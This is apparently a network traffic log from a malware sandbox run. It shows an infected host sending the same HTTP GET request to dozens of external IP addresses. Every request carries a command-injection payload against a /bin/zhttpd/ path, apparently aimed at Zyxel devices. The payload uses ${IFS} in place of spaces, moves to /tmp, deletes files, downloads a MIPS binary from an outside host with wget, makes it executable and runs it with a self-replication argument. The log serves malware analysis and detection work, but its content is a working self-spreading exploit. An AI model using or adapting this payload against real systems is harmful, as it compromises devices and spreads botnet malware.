                                                Jan 12, 2024 18:16:23.468223095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4568192.168.2.2359406154.41.224.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.468269110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4569192.168.2.2357240130.248.94.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.468312979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4570192.168.2.2337610124.235.214.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.468377113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4571192.168.2.2350230180.101.123.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.468436956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4572192.168.2.234724075.60.215.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.468493938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4573192.168.2.234440031.243.161.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.468561888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4574192.168.2.2340378196.50.8.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.468614101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4575192.168.2.2343160144.42.1.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.468693972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4576192.168.2.2351724117.169.6.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.468732119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4577192.168.2.2355176209.157.80.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.468775988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4578192.168.2.2334302146.237.208.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.468838930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4579192.168.2.2338752164.213.42.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.468911886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4580192.168.2.2354624178.217.61.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.469031096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4581192.168.2.233527475.100.10.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.469063044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4582192.168.2.2334846183.140.200.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.469106913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4583192.168.2.2346088162.111.130.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.469177961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4584192.168.2.2349266129.190.105.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.469211102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4585192.168.2.23416962.6.83.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.469266891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4586192.168.2.235233285.220.167.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.469340086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4587192.168.2.2350666180.105.115.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.469396114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4588192.168.2.234976690.230.32.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.469456911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4589192.168.2.2351586209.187.94.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.469518900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4590192.168.2.234837251.20.97.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.469578981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4591192.168.2.233502847.40.182.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.469645977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4592192.168.2.23517861.231.180.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.469698906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4593192.168.2.235699873.33.125.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.469757080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4594192.168.2.235219852.232.134.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.469825983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4595192.168.2.2347410169.80.13.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.469899893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4596192.168.2.23582749.21.47.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.469942093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4597192.168.2.2350252105.60.31.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.470001936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4598192.168.2.233748866.155.222.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.470066071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4599192.168.2.2337764210.200.172.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.470115900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4600192.168.2.235172031.134.204.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.473326921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4601192.168.2.2358734189.6.44.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.473436117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4602192.168.2.2341558160.134.50.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.473474026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4603192.168.2.2344198221.242.103.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.473510981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4604192.168.2.2351922201.231.38.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.473566055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4605192.168.2.2342730100.24.118.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.473598003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4606192.168.2.23449581.64.136.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.473650932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4607192.168.2.2349776194.10.152.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.473684072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4608192.168.2.2355140157.76.0.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.473711967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4609192.168.2.2356054112.5.107.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.473766088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4610192.168.2.2346102218.30.181.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.473793983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4611192.168.2.235232024.148.75.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.473836899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4612192.168.2.2359834175.144.49.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.473912954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4613192.168.2.2350768219.158.6.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.473922014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4614192.168.2.2350870108.44.190.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.473968983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4615192.168.2.2335638174.8.177.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.473993063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4616192.168.2.2339374142.108.49.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.474034071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4617192.168.2.235853298.173.31.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.474085093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4618192.168.2.236061692.176.100.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.474123955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4619192.168.2.2344230152.23.19.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.474152088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4620192.168.2.2347620198.187.138.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.474219084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4621192.168.2.2343952171.132.41.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.474253893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4622192.168.2.2355734137.201.136.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.474276066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4623192.168.2.2338586162.101.229.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.474319935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4624192.168.2.2334690144.105.152.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.474350929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4625192.168.2.2345492137.152.119.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.474411011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4626192.168.2.2347562169.229.202.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.474447012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4627192.168.2.2346252182.86.105.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.474494934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4628192.168.2.23559368.135.94.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.474544048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4629192.168.2.2334600166.209.225.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.474562883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4630192.168.2.2349124197.190.233.140443
                                                TimestampBytes transferredDirectionData
